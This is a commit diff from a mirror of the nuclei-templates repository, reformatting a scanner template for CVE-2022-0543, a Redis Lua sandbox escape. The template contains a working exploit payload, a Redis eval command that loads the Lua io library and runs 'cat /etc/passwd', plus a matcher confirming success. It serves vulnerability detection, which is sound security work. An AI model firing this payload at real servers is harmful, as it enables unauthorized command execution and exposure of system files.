daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2022-0543.yaml

patch-1
Ritik Chaddha 2023-11-15 23:21:25 +05:30 committed by GitHub
parent 82875b0e44
commit be5fc1142f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
network/cves/2022/CVE-2022-0543.yaml
View File

@ -5,10 +5,7 @@ info:
author: dwisiswant0 author: dwisiswant0
severity: critical severity: critical
description: | description: |
This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.
vulnerability was introduced by Debian and Ubuntu Redis packages that
insufficiently sanitized the Lua environment. The maintainers failed to
disable the package interface, allowing attackers to load arbitrary libraries.
reference: reference:
- https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
- https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
@ -28,6 +25,7 @@ info:
shodan-query: redis_version shodan-query: redis_version
vendor: redis vendor: redis
tags: cve,cve2022,network,redis,unauth,rce,kev tags: cve,cve2022,network,redis,unauth,rce,kev
tcp: tcp:
- host: - host:
- "{{Hostname}}" - "{{Hostname}}"
@ -37,8 +35,9 @@ tcp:
inputs: inputs:
- data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
read-size: 64 read-size: 64
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0:" - "root:.*:0:0:"
# digest: 4a0a00473045022027e375b83c9a6ee84e49c4a5f8ae2f56fc76db2d2acd7ec1b9a60bf45d7598de022100e7047e480c8a983cbe88770790661452320d96f1d4e18465298ff2403273a0f6:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022027e375b83c9a6ee84e49c4a5f8ae2f56fc76db2d2acd7ec1b9a60bf45d7598de022100e7047e480c8a983cbe88770790661452320d96f1d4e18465298ff2403273a0f6:922c64590222798bb761d5b6d8e72950